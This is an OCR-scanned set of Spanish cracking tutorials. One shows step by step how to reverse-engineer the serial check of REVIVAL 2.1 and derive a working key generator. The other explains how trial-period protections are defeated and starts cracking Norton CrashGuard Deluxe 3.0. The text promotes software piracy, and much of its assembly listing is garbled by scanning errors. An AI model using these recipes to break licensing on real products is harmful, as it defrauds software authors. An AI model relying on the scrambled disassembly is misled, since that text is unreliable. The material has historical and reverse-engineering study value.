4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcinoO hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 
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INTRODUCCIÓN 


¡Saludos Familia! 


Aprovechando las vacas estivales me he decidido por escribir un bonito Generador de Llaves (en inglés KeyGen) para un útil programa 
de reparación de discos duros y disquetes. Como siempre un poco de Teoría para que podamos entendernos. 


Generadores de Llaves. 


La primera pregunta que responder es ¿qué carajo es un Generador de Llaves? Suponed por un instante que sois unos de esos 
programadores perezosos y cegados por el dinero que ha construido un programa protegido con un número de serie. Si alguien desea 
registrarse debemos pagar una cifra de dinero (pequeña o no) que hará engrosar nuestra cuenta. A cambio debemos de enviarle un 
número de serie que desbloquee el programa. ¿Hasta ahora todo correcto, verdad?. ¿Pero como demonios se genera un número de serie 
diferente para cada usuario? . La respuesta es: con un Generador de Llaves. 


Existen dos tipos de Generadores de Llaves: 


A- Dependientes de los datos del cliente. 
B- Independientes de los datos del cliente. 


El tipo A es el más extendido, el número de serie se genera a partir del nombre del cliente y el de su dirección de correo (por ejemplo). Así 
dos usuarios tendrán números de serie diferentes, por que en principio sus datos personales son diferentes. 


El tipo B está un poco en desuso, pero se siguen viendo por que son fáciles de programar (recordad que los programadores son por 
naturaleza vagos y sin imaginación). 

El mismo número de serie es válido para cualquier cliente. En estos casos, el programador da un número diferente a los clientes pardillos 
que compran su producto y reza para que no se lo den a nadie. 


¿Es posible crear un Generador de Llaves? 


El programa Generador de Llaves está normalmente en el ordenata del programador, entonces, ¿cómo demonios puede un cracker 
construir un Generador ?. La respuesta es sencilla pero difícil (en general) de realizar. 

El programa debe verificar que el número de serie que introducimos es válido y ésto sólo puede hacerlo verificando ciertas propiedades 
que debe cumplir el número de serie y que fueron establecidas por el Generador. 

¿Un poco lioso verdad?, dicho de otra forma, el Generador es un codificador de números de serie y en el programa sólo existe un 
decodificador que descifra el número de serie introducido. 


Vemos un sencillo ejemplo, suponed que nuestro Generador es el siguiente: 
NúmeroSerie=(89934*4)*(nombre(5)) 


Donde nombre(5) es la quinta letra del nombre del usuario. EL número 89934 es el llamado número mágico, un número que es de agrado 
del programador (quizás el número de veces que le ha su jefe le ha jodido) y que realmente es el corazón del Generador 


En el programa, para ver que el número de serie es correcto se debe de verificar: (NúmeroSerie/(4 /nombre(5)) = 89934 


Como podéis apreciar, lo que hay en el programa es la inversa del Generador, por tanto si invertimos la inversa podemos obtener el 
Generador de Partida. 


No os engañéis, este es un Generador sencillo, lo normal es que esté ultra enrevesao , lleno de números mágicos y operaciones aritméticas 
exóticas. 


Normalmente, las rutinas de verificación realizan ciertas comprobaciones sobre la password de entrada. Generalmente pasan a mayúsculas 
y buscan ciertos caracteres en ciertas posiciones. En caso de no encontrarlos la password no es válida. Esto da pie a un truco mu útil pa 
localizar di una forma directa la rutina. Pero esto lo veremos más adelante. 


¿Pos mu bien, pero que necesito pa hacer un Generador de Llaves? 


1.- Lo primero es aislar el código del programa que verifica el número de serie. 
Además del código que las funciones que son llamadas desde la rutina de verificación (pa Saber que narices hacen). Normalmente las 
rutinas de verificación hacen uso de pequeñas rutinas: convertir a mayúsculas,convertir letras en números... 


2.- Un conocimiento exhaustivo, repito, exhaustivo del la rutina de verificación. 

Debemos saber TODO lo que hace y porqué lo hace. Recordad que tenemos que invertir su funcionamineto y esto no lo podemos hacer si 
no sabemos como funciona. Este es el punto más delicado y el que consume más tiempo. Dependiendo de las paranoias del programador 
podéis tardar horas o semanas. Se necesitan conocimientos de ensamblador y de operaciones aritméticas binarias 


3.- Invertir el funcionamineto del Generador y crear con un compilador, por ejemplo de C nuestro propio Generador. 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más fácil parchear la 
rutina de verificación para que acepte cualquier cosa. 


Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo con la filosofía 
crack (ingeniería inversa) al comprender y transformar el programa para que adapte a nuestras necesidades. 


Segúnda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméricas con bits. 
Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir adelante. 


La cuarta ventaja tiene que ver con la historia del Software. Puedes ''coleccionar"' las protecciones de tu programa favorito y ver la 
evolución de su software. 


Y como quinta un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un usuario "legal'' y 
¡problamente no tengas que crakear la próxima versión. 


Generador de Llaves para REVIVAL 2.1. 
Objetivo: REVIVAL 2.1 


Nombre: revive21.zip 

Tamaño: 874.644 bytes 

Versión: 2.1 

Site: http://uc2.unicall.be/revival/ 

Herramientas: Softlce,W32dasm o IDA 3.75 y un compilador de C. 
Dificultad: No mu difícil. 

Tiempo: 5 horas. 


Este es un interesante programa que te permite recuperar ficheros borrados de discos duros y disquetes que soporta FAT32 y NTEFS. Tiene 
una típica ventana de registro a partir de la cual podemos acceder directamente a la rutina de verificación de la pass. Esta rutina es 
extremadamente sencilla e independiente de los datos del usuario, por eso ha sido la elegida como demostración. 


Aconsejo desensamblar con el IDA PRO 3.75(una pequeña maravilla de desensamblador). Se puede hacer con el W32dasm pero el IDA nos 
da más información y nos ahorra trabajo. Por ejemplo descubre de forma automática rutinas (_touper, isdigit...) que no son reconocidas 
como tales por el W32dasm. 


Bien, manos a la obra, desensamblemos con el IDA. 


¿Ya está? 

Bien, ahora sólo hay que localizar la rutina de verificación. Empleemos un viejo truco: el 80% de las rutinas de verificación intentan 
localizar el carácter '-' (2D en hexa) o el carácter '+' (2B en hexa). 

No me preguntéis por qué, pero lo hacen. Sólo hace falta buscar un 2Dh o un 2Bh y con un poco de suerte aterrizaremos en plena rutina de 
verificación. Debemos buscar una comprobación con 2Dh o bien 2Bh, pero como las comprobaciones pueden ser de muchos tipos , sólo 
buscaremos la parte final de la comprobación. 


Resumiendo, buscaremos ', 2Dh" y ", 2Bh". En caso de existir demasiadas ocurrencias, mejor decantarse por otro método de ataque. Al 
final es el olfato de cracker el que te indica si estás en la ocurrencia correcta o no. 

En este caso hay 20 ocurrencias de ''2D"' y 18 de ''2B". UFF, quizás demasiadas (de hecho es la primera ocurrencia de ''2D" la correcta), 
así que probemos un método más directo con el Softice. 


Metemos como nombre ESTADO, como campañía PORCINO y como número de serie estúpido por ejemplo 1212121212. CTRL+D y le 
damos al botón de OK y aparece una ventana de error. 


Esta ventana se parece a un messageboxexa (por su simplicidad y por el icono en forma de exclamación y por el único botón que aparece). 
Si repetimos el mismo proceso pero poniendo en el softice bpx messsageboxexa y pulsamos el botón de OK ... 

Bingo, aparecemos en la rutina de messageboxexa. Sólo hay que seguir la secuencia de llamadas hacia atrás buscando un salto que evite 
llamar a la ventana de mensaje de error. La secuencia de pasos es: 


* Paramos en bpx messageboxexa 

* Pulsamos F12 para llegar a la rutina padre que llamó a messageboxexa. 

* Aparecemos en :4313CA pero por se ve ningún salto que evite la llamada a messageboxexa. 
* Pulsamos F12 para seguir subiendo hasta la rutina padre. 

* Aparecemos en :43145D. Pero de nuevo nada interesante. 

* De nuevo Fl2 y .... 

* Aparecemos en :40CAAGCS, esta si tiene lo que buscamos, exactamente. 


0040AA6C Call sub_40CD10 ; RUTINA DE VERIFICACIÓN 
0040AA71 add esp, 4 

0040AA74 test eax, eax 

0040AA76 jz short loc_40AABA; SALTA SI ERES UN MAL CRACKER. 
0040AA78 mov dword ptr [esi+5Ch], 1 

0040AA7F mov eax, [esi+64h] 

0040AA82 push eax 

0040AA83 push offset aName; NOMBRE. 

0040AA88 Call sub_40AD70 

0040AA8D add esp, 8 

0040AA90 mov eax, [esi+60h] 

0040AA93 push eax 

0040AA94 push offset aCompany; COMPAÑÍA. 

0040AA99 Call sub_40AD70 

0040AA9E add esp, 8 


0040AAA1 mov eax, [edi] 


0040AAA3 push eax 


0040AAA4 push offset aSerial;NÚMERO DE SERIE. 

0040AAA9 Call sub_40AD70 

0040AAAE add esp, 8 

0040AAB1 mov ecx, esi 

0040AAB3 call sub_42550E 

0040AAB8 jmp sh 

0040AABA ; ÁRA anun a 

0040AABA 

0040AABA loc_40AABA: ; CODE XREF: sub_40AA20+56_3 
0040AABA push OFFFFFFFFh 

0040AABC push 30h 

0040AABE push OEF1Fh ; DIRECCION DEL MENSAJE DE ERROR 
0040AAC3 Call sub_431413 ¡ VENTANA DE MESAJE DE ERROR 
0040AAC8 mov ecx, esi 

0040AACA Call sub_425527 

0040AACF 

0040AACF loc_40AACF': ; CODE XREF: sub_40AA20+98_3 
0040AACF push OFFFFFFFFh 

0040AAD1 mov ecx, edi 

0040AAD3 call sub_429A33 

0040AAD8 pop edi 

0040AAD9 pop esi 

0040AADA retn 

0040AADB ; ARAAARAARAMARAMARAARA RRA RARA RARA RA RARARARAMARARARARAMARARARARARARARARA AA RAR 
0040AADB 

0040AADB loc_40AADB: ; CODE XREF: sub_40AA20+25_3 
0040AADB ; sub_40AA20+40_3 

0040AADB push OFFFFFFFFh 

0040AADD push 30h 

0040AADF push OEF1Eh 

0040AAE4 Call sub_431413 

0040AAE9 pop edi 

0040AAEA pop esi 

0040AAEB retn 

0040AAEB sub_40AA20 endp 


Fijaos en el salto en :40AA76. Si saltamos caemos en la ventana de mensaje y evitamos acceder a NOMBRE,COMPAÑÍA y NÚMERO DE 
SERIE. El salto está controlado por :40AA6C call sub_40CD10 .Que interesante, una rutina que controla la ventana de mensaje de error, 
¿a qué nos suena ésto?. BINGO, estamos ante la rutina de verificación. 

Échemósle un vistazo y comentémosla. 


¡Desensamblado con el IDA ;p(0) indica el carácter 0 de la password. Recordad, empiezo a contar los caracteres desde 0. 


0040CD10 sub_40CD10 proc near ; CODE XREF: sub_404600+98_p 

0040CD10 ; sub_40AA20+4C_p 

0040CD10 

0040CD10 var_24 = byte ptr -24h ; 1 variable local. 

0040CD10 var_20 = word ptr -20h ; 2 variable local. 

0040CD10 var_1E = byte ptr -1Eh ; 3 variable local. 

0040CD10 var_1B = byte ptr -1Bh ; 4 variable local. 

0040CD10 arg_0 = dword ptr 4 ; Argumento de la función que no es más que la dirección 
de nuestra password. 

0040CD10 

0040CD10 sub esp, 24h; Ajusta la pila para reservar espacio para las varibles 
locales. 

0040CD13 push ebx; Guarda algunos registros. 

0040CD14 push esi 

0040CD15 mov esi, [esp+2Ch+arg_0] ; esi= dirección de nuestra password. 
0040CD19 push edi 

0040CD1A movsx eax, byte ptr [esi] ; eax=p(0) 

0040CD1D push eax 

0040CD1E Call _toupper ; Pasamos a mayúsculas p(0). 

0040CD23 add esp, 4 


0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 


0040CD29 
0040CD2F 
0040CD33 
0040CD34 
0040CD39 
0040CD3C 
0040CD3F 
0040CD45 
0040CD49 
0040CD4F 
0040CD50 
0040CD56 
0040CD59 
15 

0040CD5F 
0040CD64 
0040CD64 


0040CD64 
0040CD68 
0040CD69 
0040CD6E 
0040CD71 
0040CD73 
número. 

0040CD79 
0040CD7A 
0040CD7D 
0040CD7F 


0040CD84 
0040CD84 
0040CD84 
0040CD88 
0040CD89 
0040CD8E 
0040CD91 
0040CD93 
0040CD99 
0040CD9A 
0040CD9D 
0040CD9F 
0040CDA3 
0040CDA8 
0040CDAC 
0040CDB1 
0040CDB2 
0040CDB7 
0040CDBB 
0040CDBE 
0040CDC3 
0040CDC5 
0040CDC9 
0040CDCD 
0040CDD2 
0040CDD3 
0040CDD8 
0040CDDC 
0040CDDF 
0040CDE2 
0040CDE5 
0040CDE6 
0040CDE8 
0040CDEA 
0040CDED 
0040CDFO 


loc_40CD64: 


loc_40CD84: 


jnz loc_40CE7F ; Salta a flag de error si p(0) no es R. 
movsx eax, byte ptr [esi+1] ; eax=p (1) 
push eax 
Call _toupper ; Pasamos a mayúsculas p(1). 
add esp, 4 
cmp eax, 56h ; ¿ES P(1) = Vv? 
jnz loc_40CE7F ; Salta a flag de error si p(1) no es V. 
cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 
jnz loc_40CE7F ; Salta a flag de error si p(7) no es '-'. 
push esi 
Call ds:1istrlenA ; Calcula el tamaño de la password. 
cmp eax, OFh ; ¿Es el tamaño 15? 
jnz loc_40CE7F ; Salta a flag de error si el tamaño no es 
mov edi, 2 ; Segundo carácter. 
; CODE XREF: sub_40CD10+6D_3 
¡Bucle para comprobar que son números p(2)...p(6) 
movsx eax, byte ptr [edi+esil]; eax=p (2) 
push eax 
Call _isdigit ; ¿es un número p(2)? 
add esp, 4 
test eax, eax 
Jz loc_40CE64 ; Salta con flag de error si p(2) no es 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, 7 ; ¿Hemos llegado a p(7)? 
31 short loc_40CD64 ; Salta si no hemos llegado a p(7). 
mov edi, 8 ; Octavo carácter. 
¡Bucle para comprobar que son números p(8)...p(14) 
; CODE XREF: sub_40CD10+8D_3 
movsx eax, byte ptr [edi+esi];; eax=p (8) 
push eax 
Call —_isdigit ¡;¿es un número p(8)? 
add esp, 4 
test eax, eax 
Jz loc_40CE6D ; Salta con flag de error si p(8) no es número. 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, OFh ; ¿Hemos llegado a p(15)? 
31 short loc_40CD84; Salta si no hemos llegado a p(15). 
mov ax, [esi+2] ; ax=p(2)p(3) 
mov [esp+30h+var_20], ax 
lea eax, [esp+30h+var_20] 
mov [esp+30h+var_1E], O 
push eax 
Call _atoi ¡Pasa p(2)p(3) a número. 
mov cx, [esi+5] ¿cx=p (5)p(6) 
add esp, 4 
mov [esp+30h+var_20], cx 
sub al, 13h ; al=p(2)p(3)-19 
lea ecx, [esp+30h+var_20] 
mov [esp+30h+var_24], al 
mov [esp+30h+var_1E], O 
push ecx 
call _atoi ¡Pasa p(5)p(6) a número. 
lea edx, [esp+34h+var_20]; 
add esp, 4 
lea ebx, [eax-25h] ¿ebx=p (5)p (6) -37 
lea ecx, [esi+0Ah] ¡ecx=dirección de p(10) 
push edx 
mov eax, [ecx] ¿ebx=p (10)p (11)p (12)p (13) 
mov [edx], eax 
mov cl, [ecx+4] ¿;cl=p (14) 
mov [edx+4], cl 
mov [esp+34h+var_1B], O 


0040CDF5 Call 
0040CDFA add 
0040CDFD mov 
0040CDFF xor 
0040CE04 mov 
0040CE08 mov 
0040CE0D lea 
0040CE11 mov 
0040CE16 movzx 
0040CE19 push 
0040CE1A Call 
0040CE1F mov 
0040CE23 add 
0040CE26 xor 
0040CE28 mov 
0040CE2D mov 
0040CE2F mov 
0040CE34 lea 
XOR 21508) + 3 

0040CE38 cda 
0040CE39 idiv 
0040CE3B mov 
0040CE3D xor 
0040CE3F mov 
0040CE43 lea 
21508) + 3 

0040CE47 cdg 
0040CE48 idiv 
0040CE4A sub 
0040CE4D cmp 
0040CE50 jnz 
0040CE52 cmp 
0040CE56 jnz 
p(4) 

0040CE58 mov 
0040CE5D pop 
0040CE5E pop 
0040CE5F pop 
0040CE60 add 
0040CE63 

0040CE64 ; 

0040CE64 

0040CE64 loc_40CE64: 

0040CE64 

0040CE66 

0040CE67 

0040CE68 

0040CE69 

0040CE6C 

0040CE6D ; 

0040CE6D 

0040CE6D loc_40CE6D: 

0040CE6D xor 
0040CE6F pop 
0040CE70 pop 
0040CE71 pop 
0040CE72 add 
0040CE75 

0040CE76 ; 


_atoi ¡Pasa p(10)p(11)p(12)p(13)p (14) a número. 
esp, 4 

edi, eax 

di, 5468h ¿di=p(10)p(11)p(12)p(13)p (14) XOR 21508 
ax, [esi+8] ¡ax=p (8)p(9) 


[esp+30h+var_20], ax 

eax, [esp+30h+var_20] 

[esp+30h+var_1E], O 

edi, di 

eax 

_atoi ¡Pasa p(8)p(9) a número. 
byte ptr [esp+34h+var_20], al 

esp, 4 

eax, eax 

ecx, 64h 

al, bl ¡al=p (5)p(6)-37 

ebx, 0Ah 

eax, [eaxtedi+3]; eax'=(p(5)p(6)-37)+(p(10)p (11)p (12)p (13)p (14) 


ecx ¡Divide eax'/100 

cl, dl ¡¿Ccl=resto (eax'/100) 

eax, eax 

al, [esp+30h+var_24] 

eax, [eaxtedi+3]; eax=(p(2)p(3)-19)+(p(10)p (11)p(12)p(13)p (14) XOR 


ebx ¡Divide eax/10 
dl, [esi+4] ¿dl=resto (eax/10)-p (4) 
dl, ODOh ;¿Es resto(eax/10) = p(4)? 


short loc_40CE76;Salta a flag de error si resto(eax/10) no es p(4) 
byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)? 
short loc_40CE76;Salta a flag de error si resto(eax'/100) no es 


eax, 1 ; Ok todo correcto. Flag de éxito activado. 
edi 

esi 

ebx 

esp, 24h 


; CODE XREF: sub_40CD10+63_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


; CODE XREF: sub_40CD10+83_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


Antes de seguir adelante, centremonos en un par de puntos: 


- ¿Habéis descubierto los números mágicos?, sip los hay son 5468h, OAh y 64h. 

- Como es tradición la rutina checkea en este caso la presencia del carácter '-. 

Luego con un poco de paciencia, nuestra búsqueda inicial hubiera tenido sus frutos. 

- Habéis notado la pésima calidad del código. Uso innecesario de variables, instrucciones inútiles, tamaño del código exagerado. Todo esto 


es debido a que se programó en alto nivel, seguramente en C. 

¿Cómo quieren los programadores proteger su software si es de pésima calidad?. Están directamente vendidos (salvo honrosas 
excepciones, por supuesto.) 

- Si andais un poco pegaos de operacones aritméticas y de ensamblador, buscad alguno 

de los fabulosos cursos de ensamblador que hay en la Web. 


Resumamos los momentos más interesantes de la rutina de verificación: 


A) 0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 

B) 0040CD3C cmp eax, 56h ; ¿ES P(1) = V? 
C)0040CD45 cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 

D) 0040CD56 cmp eax, OFh ; ¿Es el tamaño 15? 
E) 0040CD64 ¡Bucle para comprobar que son números p(2)...p(6) 
F) 0040CD84 ¡Bucle para comprobar que son números p(8)...p(14) 
G)0040CDC3 sub al, 13h ; al=p(2)p(3)-19 

H) 0040CDDF lea ebx, [eax-25h] ; ebx=p(5)p(6)-37 

1) 0040CE34 lea eax, [eax+edi+3] ; eax'=(p(5)p(6)- 


37)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
J) 0040CE3B mov cl, dl ; Ccl=resto(eax'/100) 
K) 0040CE43 lea eax, [eax+edi+3] ; eax=(p(2)p(3)- 
19)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
L) 0040CE4D cmp dl, O0DOh ;¿Es resto(eax/10) = p(4)? 
M) 0040CE52 cmp byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)?. 


Por A),B),C),D),E) y F) sabemos que la password debe de tener este aspecto: 


00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 
RVX XX XxX X - X X X X X X X Xx 


Donde x es un número del 0 al 9. 


Despues hay dos bonitas ecuaciones: 


Por H),1),J) y M) 
I) p(8)p(9)=resto( (p(5)p(6)-0x25)+(p(10)p(11)p(12)p(13)p(14) XOR 21508) + 3) / 0x64) 


Por G),K),L) 
11) p(4)=resto ( (p (2)p (3) -0x13)+(p(10)p(11)p(12)p (13)p(14) XOR 21508) + 3) / 0Ox0A) 


Pos ya está. Estas son las ecuaciones de la rutina de verificación, ya se puede implementar nuestro propio Generador de Llaves, que no será 
más que implementar estas dos ecuaciones. 

Estas dos ecuaciones comprueban que la parte derecha sea igual a la parte izquierda (p(S)p(9) y p(4)). Nuestro Generador calculara la 
parte derecha y construirá la parte izquierda de forma adecuada. Se podrían simplificar un poco, pero no lo haré pa no complicar el 
asunto. 


Un posible Generador en C sería algo así como: 


VER CODIGO FUENTE DEL GENERADOR 


Utilizo números aleatorios (random) para generar un número de serie diferente cada vez que se ejecute e programa. Una última curiosidad, donde 
creereis que guarda nuestra pass el programa. Si lanzais el La utilidad regmon (analiza todos los accesos al Registro dels Sistema) con el programa, 
podréis apreciar que se accede a "HKEY_LOCAL_MACHINEISSOFTWARERevivallRevivalN2.0Serial" Poco imaginativo, ¿verdad?. Podéis 
modificar este número para evitar registraos y probad Con nuevas pass. 


Notas para los lectores. 


1.- Los mensajes del tipo "Hazme el crack para ....'*, ''Dime como de crackea....'*, ''Dime donde puedo encontrar...'' son automáticamente 
ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK € WKT ( WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
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MORALEJA 


INTRODUCCION 


¡Saludos Familia! 


Bastante tiempo desde mi último artículo, lo sé, pero ya estamos de vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un poco 
de teoría y lo aprendido lo aplicaremos al programa Norton CrashGuard Deluxe 3.0 desde dos puntos de vista, el temporal y el de la password pa 


registrarse. 


TIPOS DE PROTECCIONES TEMPORALES. 


Demos un peque repaso a los diferentes esquemas de protección temporal que nos podemos encontrar (recomiendo la lectura del Capítulo 4.1 de 
+0RC) 


- CINDERELLA. El programa funciona durante una cierto periodo de días (digamos 15 días) comenzando desde la fecha de instalación. 


- BEST_BEFORE. El programa funciona durante una cierto período de tiempo independientemente de la fecha de instalación. El programa caduca 
el 30/12/97. 


- COUNTDOWN. El programa funciona sólo durante unos minutos o unos segundos. 


- QUIVER. El programa funciona sólo durante un número determinado de ejecuciones. Realmente no es una protección temporal, pero su esquema 
de protección se parece mucho al de los otros tres tipos. 


UN POCO DE TEORÍA 


Analizemos como funciona una protección temporal. 


Los "inteligentes programadores" ofertan sus productos completos al público con ridículas protecciones. 
Le colocan una fecha de caducidad, pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo las grandes compañías como Micro$oft, 
Corel, o Symantec. 


La idea es distribuir masivamenete sus productos aprovechando los estupendos canales de distribución que ofrecen las revistas de Soft. Una vez 
inundado el mercado, el usuario disfrutará del producto, se acostumbrará a él, hasta que le sea indispensable y tenga que comprarlo a un precio 
desorbitado . Esta táctica no es nueva, sino preguntad a algún camello, o como la CIA distribuyo la heroína entre el Black Power. 


Pensemos un poco. ¿Cómo conoce el programa que ya ha caducado el período de evaluación?. 

Supongamos que tenemos una evaluación e 15 días e instalamos nuestro programa el 1 de febrero. 

Sumando la fecha de instalación (1 Febrero) más el período de prueba se obtiene la fecha de caducidad: 15 febrero (El día en el que lo instalas cuenta 
como día hábil). 

El programa, lo primero que calcula es si la fecha actual es menor o igual que la fecha de caducidad, y en tal caso, se ejecuta normalmente. 

Si es mayor, dará un bonito mensaje ''El período de evaluación ha expirado". 


Una cosa está clara, el programa debe guardar alguna de las dos fechas siguientes (o las dos): 
A - Fecha de Instalación y el período de evaluación. 
B - Fecha de caducidad. 


Lo normal es la opción B. Al instalarse el programa, se calcula la fecha de caducidad y se guarda en algún sitio. Normalmente se guarda en el 
registro del sistema bajo algún nombre estúpido, aunque se puede guardar en el win.ini, system.ini, fichero oculto, o algún fichero que parezca 
inofensivo. Lo cierto es que debe guardarlo. 


Existe una variante, y es que la fecha de caducidad esté dentro del ejecutable. Un ejemplo lo tenemos en la evaluación del Hotmetal 4.0., del tipo 
BEST_BEFORE, que dentro de su ejecutable aparecía 31/12/97. Madre de Mitra, qué estúpidos pueden llegar a ser los zombi-programadores. 
Dependiendo de la pericia del programador la fecha de caducidad puede estar o no encriptada para ocultarla de la vista del usuario y para que sea 
difícil modificarla. Resumiendo, el programa debe guardar la fecha de caducidad y comprobarla al inicio del programa con la fecha actual. 


Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de dónde saca la fecha actual?. Normalmente (el 99% de las veces) se extrae con una 
llamada a la función getlocaltimeo o getsystemtime. Pero se puede extraer viendo la fecha de algún fichero que se modifique periódicamente como el 
system.dat o el bootlog.txt. 


Los puntos de ataque a este esquema son claros: 


- Atacar en el cálculo de la fecha de caducidad. 
En vez de sumar 15 días sumamos 15 siglos. Esta aproximación es difícil por que el cálculo se realiza una única vez, generalmente en la instalación. 


- Modificar la fecha de caducidad. 
Si la fecha está encriptada, necesitaríamos construir un algoritmo de encriptación para la nueva fecha que deseemos introducir. Por lo que en 
general, puede ser complicado. 


- Forzar la caducidad del programa. Se analizan los mensajes que da el programa y a partir de ellos se le sigue la pista hacia atrás. Es una táctica 
muy utilizada. 


- Atacar en la comprobación de la fecha actual y la fecha de caducidad. Simplemente modifica la comprobación para que siempre estemos en el 
período de evaluación. Esta es una opción elegante. 


Alguien podría pensar que si se echa pa trás el reloj de W95, la protección temporal se elimina. Para evitar esta '"'trampilla", los programadores 
colocan código como el siguiente: 


SI está activada la marca de caducidad ENTONCES el programa ha caducado y se finaliza el programa 
DE LO CONTRARIO SI fechaActualfechaCAducidad ENTONCES activar marca de caducidad 


Como veis si os pasais de la fecha de caducidad, se activa una marca que impedirá que se ejecute el programa aunque modifiquéis el reloj. Esta 
marca se guarda en los mismos sitios donde se guarda la fecha de caducidad. 


A veces, la protección temporal queda eliminada introduciendo una palabra clave, por lo que a veces es más rápido atacar por la password. 


Para averiguar el fichero que contiene la protección temporal, se puede usar el Softlce y poner un bpx getlocaltime, o bien una nueva técnica, muy 
útil no sólo para protecciones temporales. 
Veámosla. 


EN BUSCA DE LA FRASE MÁGICA 


Todos los mensajes de un programa, los de error, los de felicitación, los de aviso, no son más que cadenas de caracteres que deben de residir en un 
fichero. Para protecciones temporales es útil buscar mensajes como 'expire', 'demo", 'evaluation'. Si localizamos estos mensajes habremos localizado, 
generalmente, el fichero que contiene la protección y podemos desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con buscar los 
mensajes 'unregistered', 'register' para localizar el programa con la protección en esquemas por palabra clave. Recomiendo una herramienta 
excelente para buscar cadenas, es el programa sr32.exe, Search € Replace for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajáoslo y 
crackearlo, tiene una bonita y sencillota protección del tipo CINDERELLA. 


EL REGISTRO DEL SISTEMA 


El Registro del Sistema no es má que un fichero gigante (system.dat) donde W95 y el esto de los programas dejan sus miserias, osea, sus variables, 
sus parámetros de configuración, su fecha de caducidad, sus marcas de caducidad. Muchos cracks sólo necesitan modificar adecuadamente el 
system.dat Es muy conveniente que le echéis un vistazo, aprenderéis mucho y podréis modificar muchos de los parámetros del Windoze. Para editar 
el registro, se utiliza normalmente el programa regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo que lo ejecutéis con el 
parámetro /v ,osease, c:1windowsregedit /v 


COMO CRACKEAR Norton CrashGuard Deluxe 3.0 


Objetivo: Norton CrashGuard Deluxe 3.0. 
Versión: 3.0 

Nombre del ejecutable: ncgd3w95.exe 
Website: http://www.symantec.com 
Tamaño del ejecutable: 11.964.671 bytes. 
Tipo de protección: Cinderella. 
Dificultad: Medio. 

Tiempo de crackeo: 2 horas. 
Herramientas: W32dasm8.X, Softlce. 


En esta ocasión, nuestro objetivo es una gran y abominable compañia, la Symantec y uno de sus muchos y abominables producto: Norton 
CrashGuard Deluxe 3.0 Básicamente, el programa consigue, en algunas ocasiones, que las aplicaciones que se cuelgan no bloqueen al Windoze. Cosa 
de agradecer dado el alto índice de siniestralidad de las aplicaciones y del propio Windoze. Además de tener una B.D de información sobre el PC, 
una antivirus ... Se protege con protección temporal CINDERELLA de 30 días. 


PRIMERA EXPLORACIÓN 


Instalamos el programa y antes de finalizar la instalación ya nos pide que nos registremos, mal asunto, quieren cobrar antes de que probemos su 
producto, su codicia de palpa ante incluso de ver el programa. 


Una vez instalado, nos ha metido a escondidas varias cosas: 


- Una DIl con un extraño nombre: 30vfv6vn.sys situada en el raiz de la unidad c: El nombre varía en cada instalación, sólo permanece fijo *fv6vn.sys, 
los 3 primeros caracteres son variables. Sospecho que sólo es un indicador para ver si el programa ya ha sido instalado. 


- Una aplicación en el arranque del Windoze Norton CrashGuard Deluxe Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicación por dos 
veces con el nombre de checkup Su misión es detectar cualquier cambio en el reloj del sistema para bloquear inmediatamente la aplicación si nos 
pasamos de la fecha de caducidad. 


Además se crean dos directorios Norton CrashGuard y Norton CrashGuard Deluxe y nos aparece un bonito icono en el escritorio del Windoze con 
forma de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si fuera poco, dos iconos en la barra de tareas, la aplicación 
propiamemte dicha (escudo gris con una N en azul) y una historia de los cuelges de los programas (un reondel con una marca de verificación). 


Si pulsamos en el icono del escritorio nos aparece una ventana donde nos dice que nos compremos INMEDIATAMENTE la aplicación a un precio 
fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el número de días que restan para el programa deje de funcionar. Además 
